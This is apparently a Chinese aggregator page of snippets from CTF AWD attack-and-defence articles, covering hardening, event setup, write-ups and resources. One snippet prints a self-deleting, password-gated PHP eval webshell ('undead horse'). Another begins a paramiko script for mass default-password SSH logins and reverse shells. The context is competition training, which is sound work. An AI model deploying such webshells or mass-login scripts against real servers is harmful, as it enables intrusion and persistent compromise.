首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
ctf awd比赛大纲
2024-11-09
CTF线下赛AWD套路小结
近打了2场CTF线下赛,把AWD模式中的一些小套路做一些总结,本人web狗,二进制部分就不班门弄斧了. 一. AWD模式简介 AWD:Attack With Defence,比赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍可以进行得分,修复漏洞可以避免被其他队伍攻击失分. 一般分配Web服务器,服务器(多数为Linux)某处存在flag(一般在根目录下): 可能会提供一台流量分析虚拟机,可以下载流量文件进行数据分析: flag在主办方的设定下每隔一定时间刷新一轮: 各队一
CTF AWD模式攻防Note
###0x01 AWD模式 Attack With Defence,简而言之就是你既是一个hacker,又是一个manager.比赛形式:一般就是一个ssh对应一个web服务,然后flag五分钟一轮,各队一般都有自己的初始分数,flag被拿会被拿走flag的队伍均分,主办方会对每个队伍的服务进行check,check不过就扣分,扣除的分值由服务check正常的队伍均分. ###0x02 出题思路 ####1:题目类型 1-出题人自己写的cms,为了恶心然后加个so. 2-常见或者不常见的cms.
AWD比赛常规套路
作者:Leafer 本文属于Arctic shell原创内容计划文章,转载请注明原文地址! 比赛环境:纯净win10,最新版kali,securecrt或者WinSCP 在进入服务器后应进行的常规操作: 1备份网站文件 2 修改数据库默认密码 3 修改网页登陆端一切弱密码 4 查看是否留有后门账户 5 关闭不必要端口,如远程登陆端口 6 使用命令匹配一句话特性 7 关注是否运行了“特殊”进程 8 权限高可以设置防火墙或者禁止他人修改本目录 1 备份网站 tar -zcvf web.tar.g
代码审计-四叶草杯线下awd比赛源码web2
今晚简单来看看那天比赛的源码吧,比赛的时候还是有些慌没有好好去静下心看代码. awd给的题中的漏洞,都是那种可以快速让你利用拿到权限后得到flag的那种,特别复杂利用的一般没有. 建议先黑盒去尝试,例如前台上传,后台上传,等等,执行失败再来结合代码审计看看是否可以绕过利用. 所以审计中重点关注预留后门,注入,文件上传,命令/代码执行. 0x01 预留后门 没有太多套路和隐藏 就是明显的马 比较有意思的是第一个大马. 当时以为就是普通的$pass = 'ec38fe2a8497e0a8d6d34
AWD比赛组织指南
目录 题目构建 平台构建 后端部署流程 前端展示 批量启动 check 题目构建 赛题全部使用docker部署,需准备check脚本和镜像 镜像构建注意事项 1.注意web目录权限 2.注意服务是否自启动 3.修改ssh配置 4.创建flag文件并修改权限为600 这里基础镜像建议采用下面这两个,原因很简单,比较小,便于移植 ctfhub/base_web_nginx_mysql_php_56 ctfhub/base_web_nginx_mysql_php_73 docker pull ctfh
关于参加AWD攻防比赛心得体会
今天只是简单写下心得和体会 平时工作很忙 留给学习的时间更加珍少宝贵. 重点说下第二天的攻防比赛吧 . 三波web题 .涉及jsp,php,py. 前期我们打的很猛.第一波jsp的题看到有首页预留后门,和css路径下一个非常隐蔽的马,我们利用这个马打了一大波flag,后面审计发现后台也是弱口令,存在上传. 而在后面,我们也利用几个马打了很大一波,名次很靠前,却没有好好防守,犯了一些致命错误,源码直接被人家删完,分数一点点拖后.到最后只有省3的名次. 不记录多的,一个是平时练习不够确实和人家前面
CTF 文件包含与伪协议
正巧在写代码审计的文章,无意间看到了一篇CTF的代码审计,CTF题目很好,用的姿势正如标题,文件包含和伪协议. 先放出原文链接(http://www.freebuf.com/column/150028.html) 题目源自国外某挑战平台,平台上还有许多其他有趣的challenges题目. 站点地址:http://chall.tasteless.eu/ 这次的题目链接:http://level3.tasteless.eu/ 下面就做题吧. 首先看下源码 <?php highlight_file('
20154312 曾林 ExpFinal CTF Writeup
0.写在前面 1.不合理的验证方式 2.加密与解密的对抗 3.一个SQL引发的血案 4.管理员的诟病 5.备份信息的泄露 6.svn信息泄露 7.coding 8.平衡权限的威胁 9.文件上传的突破 10.文件下载的利用 11.include的沦陷 12.include的沦陷(二) 13.exce的沦陷 14.ftp的逆袭 15.ftp的漏洞 16.幽灵的Remote Desktop 17.无法爆破的密码 18.IIS ghost 19.xampp 20.dangerous 445 0.写在前面
AWD攻防工具脚本汇总(一)
最近工作很忙 今天抽空准备下AWD比赛得攻防工具和脚本 以下只是常用 希望下周不被吊锤~~ 后续整理后想抽空写成一个攻击框架汇总放github~~ 这里从各种情景和需求中去总结工具和脚本的使用 情景一 默认SSH密码批量反弹shell 官方在给出服务器密码时,很有可能是默认的,需要赶快修改自己的密码并尝试能不能登陆别人的靶机 #-*- coding:utf-8 -*- import paramiko ip = '192.168.1.137' port = ' username = 'root
线下AWD平台搭建以及一些相关问题解决
线下AWD平台搭建以及一些相关问题解决 一.前言 文章首发于tools,因为发现了一些新问题但是没法改,所以在博客进行补充. 因为很多人可能没有机会参加线下的AWD比赛,导致缺乏这方面经验,比如我参加过五次线下AWD攻防,虽然看过许多网上的AWD打发套路,但终究都是纸上谈兵,所以前几次都是被吊锤,一来不熟悉环境,二来有点手忙脚乱,其实根本原因就是缺乏经验,因此最近翻了翻Github,终于找到一个不错的项目,下面便是搭建过程和一些注意事项. 二.平台搭建过程: 准备工作:需要准备一台Ubuntu虚
使用pwn_deploy_chroot部署国赛pwn比赛题目
目录 使用pwn_deploy_chroot部署国赛pwn比赛题目 一.前言 二.Docker 三.部署镜像 四.pwn_deploy_chroot 五.check && exp 六.参考链接 使用pwn_deploy_chroot部署国赛pwn比赛题目 一.前言 最近打国赛,需要build,组内大佬们决定build pwn题,于是啥也不会的我就去看docker了.但是自己从头看docker.dockerfile有点困难,最后找到一个工具pwn_deploy_chroot,很方便的完成了d
AWD不死马与克制方法
一个简单的不死马如: <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>'; //pass=pass while (1){ file_put
CTF:从0到1 -> zero2one
本篇blog首发0xffff论坛(CTF:从0到1->zero2one - 0xFFFF),中间有各位大佬补充,搬到了个人博客CTF:从0到1 -> zero2one | c10udlnk_Log这里,在博客园这边也放一下hahah.是一点CTF的入门心得吧,希望能给想玩CTF的小朋友们一点帮助. 起文章名的时候没想太多光想着把to->2用上去,撞名都是我的锅(捂头 这里还只是个划水摸鱼的萌新(捂头)有什么写错的地方烦请大佬们多多补充谢谢0v0 持续更新ing... 0x01 关于CTF
收集的常用的CTF学习资源网站
http://www.sec-wiki.com/skill/ 安全技能学习路线(迷茫就看它) https://wiki.x10sec.org/ 介绍了CTF各个方向的基础知识 逆向 http://www.52pojie.cn/ 吾爱破解 http://bbs.pediy.com/ 看雪论坛 编程查阅手册 http://www.w3school.com.cn/ http://www.runoob.com/ Ctf练习 http://hacking
通过HTTP参数污染绕过WAF拦截 (转)
上个星期我被邀请组队去参加一个由CSAW组织的CTF夺旗比赛.因为老婆孩子的缘故,我只能挑一个与Web漏洞利用相关的题目,名字叫做”HorceForce”.这道题价值300点.这道题大概的背景是,你拥有一个低权限的帐号并需要找到方法来获得管理员权限. 当然,有很多种方法来介绍如何通过这关,但我想分享下我的通关经验. 当把一些单引号作为参数值发送之后返回了MySQL的典型报错信息“MySQL SQL Error Message”,因此可以轻易发现这里存在一个SQL注入漏洞. 然后,正如你了解的,我
【ARTS】01_08_左耳听风-20181231~20190106
ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algorithm [leetcode]557. Reverse Words in a String III https://leetcode.com/problems/reverse-words-in-a-string-iii/ 1)problem Given a string, you need to
记bugku的——“welcome to bugkuctf”
今天终于拾起来ctf的比赛了,开始了练习之旅.今天写一道bugku上的题目wp,属于利用php源码泄漏的题目吧,我觉得不是很简单...所以把自己的思路放上来. 题目源头:http://120.24.86.145:8006/test1/ 题目打开后得到如下的信息,查看源码后发现 很显然想让我们利用源码去得到flag.这里我们稍微解释下这个源码的意思. 开始有三个变量:user,file,pass,但是我们发现这里的pass也就是password没有什么用,所以我们重点关注前两个变量.看下面的条件
Python采集CSDN博客排行榜数据
文章目录 前言 网络爬虫 搜索引擎 爬虫应用 谨防违法 爬虫实战 网页分析 编写代码 运行效果 反爬技术 前言 很多人学习python,不知道从何学起.很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手.很多已经做案例的人,却不知道如何去学习更加高深的知识.那么针对这三类人,我给大家提供一个好的学习平台,免费领取视频教程,电子书籍,以及课程的源代码!QQ群:101677771 开始接触 CTF 网络安全比赛发现不会写 Python 脚本的话简直寸步难行……故丢弃 Java 学习
乌云wooyun网站硬盘复活
AWD比赛防止没有网络,在移动硬盘里面准备一个乌云漏洞库. 之前也想过弄一个乌云的镜像网站,无奈学生机性能太低下了,部署到公网上服务器存储空间都不够,只能部署在本地硬盘了. 乌云镜像的开源地址:https://github.com/m0l1ce/wooyunallbugs 文件的百度网盘下载链接:https://pan.baidu.com/s/1htwVF3Q 密码为:oskw 文件结构: 代码在bugs文件里面 wooyun.rar存储的是数据库文件 其余几个数字开头的文件为图片文件(图片文件
burp-requests插件安装使用
这段时间都没更博客,扫描器的更新也暂时停止了,因为回了学校之后需要准备实验室招新和几个比赛的事情,内疚两秒钟,赶快学习! burp里面的插件很多,但是不要被纷繁复杂的功能迷了双眼,还是那句话:适合自己的才是最好的.只有需要用到的时候根据需求寻找插件再去下载安装,才能起到最大的作用,如果仅仅是为了充实插件库而去下载,可能过了一段时间之后插件的作用是啥都忘记了 :D 为了在最近的两个线下AWD比赛中快速写出获取flag的代码,当存在python环境的时候,我们可以使用burpsuite中的reque
热门专题
pandas 标签截取列
oracle连接C语言
预定义宏 __GNUC__
easyui datagrid 编辑器选中文字
8421bcd码转换十进制公式
rf 断言失败继续执行
-125变为ascll码
ubuntu虚拟机pgadmin4连接不到服务器
hive 日期函数 取近一个月数据
pagehelper插入条数到最后一页
jsp table th宽度
ubuntu怎么做iscsi
pgpool pg 容器化部署
jvm GC不能工作的区域
php后缀文件手机移动不了
vs dll 文件复制到exe目录
Windows7 SP1原版超纯精简版X64&X86
python pulsar失败放回
filezilla连接centos6.5
vue清除slot内容